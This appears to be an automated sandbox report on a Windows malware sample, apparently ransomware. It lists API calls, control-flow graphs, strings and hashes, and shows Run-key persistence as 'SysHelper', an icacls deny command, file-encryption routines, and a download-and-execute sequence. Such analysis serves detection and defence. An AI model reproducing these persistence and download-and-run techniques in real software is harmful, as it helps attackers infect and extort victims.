                                                                                                                                                                        control_flow_graph 2367 b9fb98-b9fb9f 2368 b9fba0-b9fbb9 2367->2368 2368->2368 2369 b9fbbb-b9fbcf 2368->2369 2370 b9fbd1 2369->2370 2371 b9fbd3-b9fc02 PathAppendW call ba8400 2369->2371 2370->2371 2374 b9fc0f-b9fc29 2371->2374 2375 b9fc04-b9fc0c call bb2587 2371->2375 2377 b9fc49-b9fc4c 2374->2377 2378 b9fc2b-b9fc2f 2374->2378 2375->2374 2380 b9fc4f-b9fc6b PathFileExistsW 2377->2380 2378->2380 2381 b9fc31-b9fc47 call bb05a0 2378->2381 2383 b9fc6d-b9fc86 call bb0c62 2380->2383 2384 b9fcdf-b9fce5 2380->2384 2381->2380 2394 b9fc88 2383->2394 2395 b9fc8a-b9fc9f lstrcpyW 2383->2395 2386 b9fcf0-b9fd07 call ba7140 2384->2386 2387 b9fce7-b9fced call bb2587 2384->2387 2396 b9fd09 2386->2396 2397 b9fd0b-b9fd20 FindFirstFileW 2386->2397 2387->2386 2394->2395 2398 b9fca1 2395->2398 2399 b9fca3-b9fcdc lstrcatW call ba4690 call b9f0e0 call bb0bed 2395->2399 2396->2397 2400 b9fd30-b9fd4c 2397->2400 2401 b9fd22-b9fd2d call bb2587 2397->2401 2398->2399 2399->2384 2405 ba0072-ba0076 2400->2405 2406 b9fd52-b9fd55 2400->2406 2401->2400 2407 ba0078-ba0083 call bb2587 2405->2407 2408 ba0086-ba00a4 2405->2408 2411 b9fd60-b9fd6b 2406->2411 2407->2408 2413 ba00b1-ba00c9 2408->2413 2414 ba00a6-ba00ae call bb2587 2408->2414 2416 b9fd70-b9fd76 2411->2416 2420 ba00cb-ba00d3 call bb2587 2413->2420 2421 ba00d6-ba00ee 2413->2421 2414->2413 2422 b9fd78-b9fd7b 2416->2422 2423 b9fd96-b9fd98 2416->2423 2420->2421 2433 ba00fb-ba010b 2421->2433 2434 ba00f0-ba00f8 call bb2587 2421->2434 2427 b9fd7d-b9fd85 2422->2427 2428 b9fd92-b9fd94 2422->2428 2430 b9fd9b-b9fd9d 2423->2430 2427->2423 2432 b9fd87-b9fd90 2427->2432 2428->2430 2435 ba0052-ba0065 FindNextFileW 2430->2435 2436 b9fda3-b9fdae 2430->2436 2432->2416 2432->2428 2434->2433 2435->2411 2439 ba006b-ba006c FindClose 2435->2439 2437 b9fdb0-b9fdb6 2436->2437 2440 b9fdb8-b9fdbb 
2437->2440 2441 b9fdd6-b9fdd8 2437->2441 2439->2405 2443 b9fdbd-b9fdc5 2440->2443 2444 b9fdd2-b9fdd4 2440->2444 2445 b9fddb-b9fddd 2441->2445 2443->2441 2446 b9fdc7-b9fdd0 2443->2446 2444->2445 2445->2435 2447 b9fde3-b9fdea 2445->2447 2446->2437 2446->2444 2448 b9fdf0-b9fe71 call ba7140 call ba5ae0 call ba4690 call ba3b70 2447->2448 2449 b9fec2-b9fecc 2447->2449 2471 b9fe81-b9fea9 2448->2471 2472 b9fe73-b9fe7e call bb2587 2448->2472 2451 b9feda-b9fede 2449->2451 2452 b9fece-b9fed5 call ba1ab0 2449->2452 2451->2435 2455 b9fee4-b9ff13 call ba4690 2451->2455 2452->2451 2461 b9ff19-b9ff1f 2455->2461 2462 b9ff15-b9ff17 2455->2462 2464 b9ff22-b9ff2b 2461->2464 2463 b9ff31-b9ff6a call ba5ae0 PathFindExtensionW 2462->2463 2473 b9ff9a-b9ffa8 2463->2473 2474 b9ff6c 2463->2474 2464->2464 2466 b9ff2d-b9ff2f 2464->2466 2466->2463 2471->2435 2478 b9feaf-b9febd call bb2587 2471->2478 2472->2471 2476 b9ffda-b9ffde 2473->2476 2477 b9ffaa 2473->2477 2479 b9ff70-b9ff74 2474->2479 2485 ba003a-ba0042 2476->2485 2486 b9ffe0-b9ffe9 2476->2486 2481 b9ffb0-b9ffb4 2477->2481 2478->2435 2483 b9ff7a 2479->2483 2484 b9ff76-b9ff78 2479->2484 2487 b9ffba 2481->2487 2488 b9ffb6-b9ffb8 2481->2488 2490 b9ff7c-b9ff88 call bb1c02 2483->2490 2484->2490 2491 ba004f 2485->2491 2492 ba0044-ba004c call bb2587 2485->2492 2493 b9ffeb 2486->2493 2494 b9ffed-b9fff9 call bb1c02 2486->2494 2495 b9ffbc-b9ffce call bb1c02 2487->2495 2488->2495 2505 b9ff8a-b9ff8f 2490->2505 2506 b9ff93 2490->2506 2491->2435 2492->2491 2493->2494 2494->2485 2503 b9fffb-ba000b 2494->2503 2495->2485 2510 b9ffd0-b9ffd5 2495->2510 2508 ba000f-ba0026 call bb1c02 2503->2508 2509 ba000d 2503->2509 2505->2479 2511 b9ff91 2505->2511 2507 b9ff97 2506->2507 2507->2473 2508->2485 2515 ba0028-ba0035 call ba11c0 2508->2515 2509->2508 2510->2481 2513 b9ffd7 2510->2513 2511->2507 2513->2476 2515->2485
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                        • Opcode ID: 7a5285165aaf4b1587d2ae7be8df9f8986128b1d7e0713c34aa4609b1026d5da
                                                                                                                                                                        • Instruction ID: bba2004e6dd673320710f17899889a62ef68a838ff8181a5209c29749342ec4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5285165aaf4b1587d2ae7be8df9f8986128b1d7e0713c34aa4609b1026d5da
                                                                                                                                                                        • Instruction Fuzzy Hash: 91B15970D142099BDF20EFA4C885BEEB7F5FF15318F1040B9E409AB251EB759A45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00BA1E99
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00BA1EA5
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA1EB4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA1EBF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA1ECE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00BA1EDB
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00BA1EFC
                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00BA1F14
                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00BA1F64
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00BA1F83
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BA1F8E
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00BA202D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA2036
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA204C
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA206E
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2090
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00C902FC), ref: 00BA20AA
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA20C0
                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00BA20CE
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BA20D7
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00BA20F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BA20FC
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2120
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00BA2146
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00BA2158
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA216D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                        • Opcode ID: 6d1d11e8eec05ad37b82ed84a73950069a2f931c2e396b3661a7d0c9d6ac13be
                                                                                                                                                                        • Instruction ID: a462904f1f806b46da07b537519e7d62a0c5dc1e09f74b1344c065141fd00c9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d1d11e8eec05ad37b82ed84a73950069a2f931c2e396b3661a7d0c9d6ac13be
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E15B75D0431AAFDF24DBA4CD89BEEB7B8FF04305F1044AAE505B6190EB74AA85CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00BA120F
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00BA1228
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA123D
                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00BA1277
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00BA12B1
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA12C8
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00BA1301
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00BA1314
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA131B
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00BA1349
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00BA1381
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA1388
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00BA13E6
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00BA1409
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00BA1417
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA141E
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00BA1471
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00BA1491
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00BA14CF
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00BA159D
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00BA15D0
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00BA15F8
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00BA1649
                                                                                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA166B
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA1678
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00BA168D
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA16D6
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA16EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                        • API String ID: 254274740-1186676987
                                                                                                                                                                        • Opcode ID: 33fa40aba69a8bb190c8e80808bea4005c2dcc299c8221a300b7d1bb98cef3e9
                                                                                                                                                                        • Instruction ID: 9d8e11079d4c17064d9213862ed4009ccb8dca204e52642fc03e9da49ab6df0d
                                                                                                                                                                        • Opcode Fuzzy Hash: 33fa40aba69a8bb190c8e80808bea4005c2dcc299c8221a300b7d1bb98cef3e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 96228970D04208AFEF14EBA8DC85BEEBBB8EF06305F1041A9F515B7292DB745A44CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00B9ECB0: _strtok.LIBCMT ref: 00B9ED66
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00BADCF5
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00BADD01
                                                                                                                                                                          • Part of subcall function 00BA3C40: _memset.LIBCMT ref: 00BA3C83
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00BADD3C
                                                                                                                                                                        • UuidToStringA.RPCRT4(?,?), ref: 00BADD57
                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00BADDB4
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,00000000), ref: 00BADDD3
                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00BADDDC
                                                                                                                                                                        • _memset.LIBCMT ref: 00BADEE7
                                                                                                                                                                        • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00BADEFC
                                                                                                                                                                          • Part of subcall function 00BA2900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00BA2966
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BADF50
                                                                                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000), ref: 00BAE07B
                                                                                                                                                                          • Part of subcall function 00B9DD40: _wcsstr.LIBCMT ref: 00B9DD8D
                                                                                                                                                                          • Part of subcall function 00B9DD40: _wcsstr.LIBCMT ref: 00B9DDB6
                                                                                                                                                                          • Part of subcall function 00B9DD40: _memset.LIBCMT ref: 00B9DDE4
                                                                                                                                                                          • Part of subcall function 00B9DD40: lstrlenW.KERNEL32(?), ref: 00B9DE0A
                                                                                                                                                                          • Part of subcall function 00B9DD40: gethostbyname.WS2_32(00C90134), ref: 00B9DEA7
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BADFDD
                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 00BAE10D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAE229
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,?), ref: 00BAE23F
                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00BAE288
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BAE2A0
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00BAE2C7
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BAE2FB
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAE317
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE324
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00BAE32A
                                                                                                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00BAE34D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                                                                                        • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                                                                                        • API String ID: 1843630811-800396732
                                                                                                                                                                        • Opcode ID: c4f6d8012be6e8dad9e3ee461557c078abb87fdfef01c419299b57314359ab44
                                                                                                                                                                        • Instruction ID: 0b1c58cbae60341db35a23c84f06c08a16d876a53fd87583f13f2702625884f2
                                                                                                                                                                        • Opcode Fuzzy Hash: c4f6d8012be6e8dad9e3ee461557c078abb87fdfef01c419299b57314359ab44
                                                                                                                                                                        • Instruction Fuzzy Hash: 30328C7010C3809FEB30DF24C849B9FBBE4AF96708F10495CF5995A292D7B69548CBA3
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA2235
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00BA2240
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00BA2248
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00BA2256
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA226A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA2275
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA2280
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00BA2291
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA229F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA22AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA22B5
                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00BA22CD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00BA22FE
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00BA2315
                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00BA232C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA2347
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                        • Opcode ID: 9e9ec632f06de9b738aeef531f2f24c949c53ee826a388f191054940dd39a5e5
                                                                                                                                                                        • Instruction ID: a1d45fc6c4c0febdd17711efe1fb3018bd7ef492a5e00e474a1ef5a1615f57ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9ec632f06de9b738aeef531f2f24c949c53ee826a388f191054940dd39a5e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 13313F71E00319AFDF10AFA99C89FEEB7F8FF45705F1040AAE904E2150DA749A418BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BAF15E
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BAF185
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BAF19D
                                                                                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00BAF9D0
                                                                                                                                                                          • Part of subcall function 00BA0A50: GetLogicalDrives.KERNEL32 ref: 00BA0A75
                                                                                                                                                                          • Part of subcall function 00BA0A50: SetErrorMode.KERNEL32(00000001,00C90234,00000002), ref: 00BA0AE2
                                                                                                                                                                          • Part of subcall function 00BA0A50: PathFileExistsA.SHLWAPI(?), ref: 00BA0AF9
                                                                                                                                                                          • Part of subcall function 00BA0A50: SetErrorMode.KERNEL32(00000000), ref: 00BA0B02
                                                                                                                                                                          • Part of subcall function 00BA0A50: GetDriveTypeA.KERNEL32(?), ref: 00BA0B1B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                                        • String ID: C:\
                                                                                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                                                                                        • Opcode ID: ac0f91d27fcf3c7e2e46c4aeb79f484c7f6016962d7f7bf8e1ac3553e3547090
                                                                                                                                                                        • Instruction ID: 7e6b594b6ece7ac19d8a14d62a6d0b342751d920a04c24dd803d8509bf5b6631
                                                                                                                                                                        • Opcode Fuzzy Hash: ac0f91d27fcf3c7e2e46c4aeb79f484c7f6016962d7f7bf8e1ac3553e3547090
                                                                                                                                                                        • Instruction Fuzzy Hash: A842AD75D043069BDF24DFA8C885BEEBBF1BF45308F1441A9E805AB381D7B5AA05CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00B9CFCD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDA
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDD
                                                                                                                                                                        Strings
